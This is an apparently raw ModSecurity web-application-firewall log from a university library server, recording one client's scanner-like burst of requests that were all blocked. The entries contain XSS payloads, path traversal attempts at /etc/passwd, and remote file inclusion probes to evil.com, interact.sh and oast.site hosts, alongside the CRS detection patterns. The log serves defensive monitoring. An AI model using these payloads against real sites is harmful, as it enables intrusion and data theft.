"8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAApXgrEAAAAU"]
[Tue Aug 29 11:55:30.668727 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAAqeFX4AAAAx"]
[Tue Aug 29 11:55:30.720515 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAApa-QkAAAAg"]
[Tue Aug 29 11:55:31.643518 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAApbUikAAAAh"]
[Tue Aug 29 11:55:32.927172 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAAolKrsAAAAe"]
[Tue Aug 29 11:55:33.888879 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RcCo-f0AAAqTvtgAAAAa"]
[Tue Aug 29 11:55:35.776076 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16R8Co-f0AAAqTvt4AAAAa"]
[Tue Aug 29 11:55:35.885070 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:key: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16R8Co-f0AAApbUkUAAAAh"]
[Tue Aug 29 11:55:36.687859 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAoz8IwAAAAS"]
[Tue Aug 29 11:55:37.812245 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16ScCo-f0AAApbUk0AAAAh"]
[Tue Aug 29 11:55:38.036118 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16SsCo-f0AAAq2KeMAAAAE"]
[Tue Aug 29 11:55:38.040251 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAAqTvvMAAAAa"]
[Tue Aug 29 11:55:38.627432 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16SsCo-f0AAAq3a54AAAAI"]
[Tue Aug 29 11:55:39.910935 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16S8Co-f0AAApHRkQAAAAP"]
[Tue Aug 29 11:55:41.859525 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAqY6GoAAAAr"]
[Tue Aug 29 11:55:43.835731 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAApbUnYAAAAh"]
[Tue Aug 29 11:55:43.973826 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16T8Co-f0AAAqqticAAAAA"]
[Tue Aug 29 11:55:44.566957 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAqY6HkAAAAr"]
[Tue Aug 29 11:55:44.625004 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqSwzUAAAAN"]
[Tue Aug 29 11:55:45.583286 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAqeFawAAAAx"]
[Tue Aug 29 11:55:46.531085 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAqeFbgAAAAx"]
[Tue Aug 29 11:55:46.623045 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAolKwUAAAAe"]
[Tue Aug 29 11:55:46.719044 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAolKwgAAAAe"]
[Tue Aug 29 11:55:46.731566 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAqY6I8AAAAr"]
[Tue Aug 29 11:55:47.714349 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAqY6JUAAAAr"]
[Tue Aug 29 11:55:48.563560 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAqqtkUAAAAA"]
[Tue Aug 29 11:55:48.571175 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAqY6KUAAAAr"]
[Tue Aug 29 11:55:51.996220 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16V8Co-f0AAAqeFdEAAAAx"]
[Tue Aug 29 11:55:52.026621 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0ujoipta91e56n.oast.site found within TX:1: cjmnijtjmimvgniikdb0ujoipta91e56n.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAAolKx8AAAAe"]
[Tue Aug 29 11:55:52.119039 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16WMCo-f0AAAqY6LYAAAAr"]
[Tue Aug 29 11:55:52.529649 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0ocaoe86innxjx.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0ocaoe86innxjx.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAArC7ZkAAAAW"]
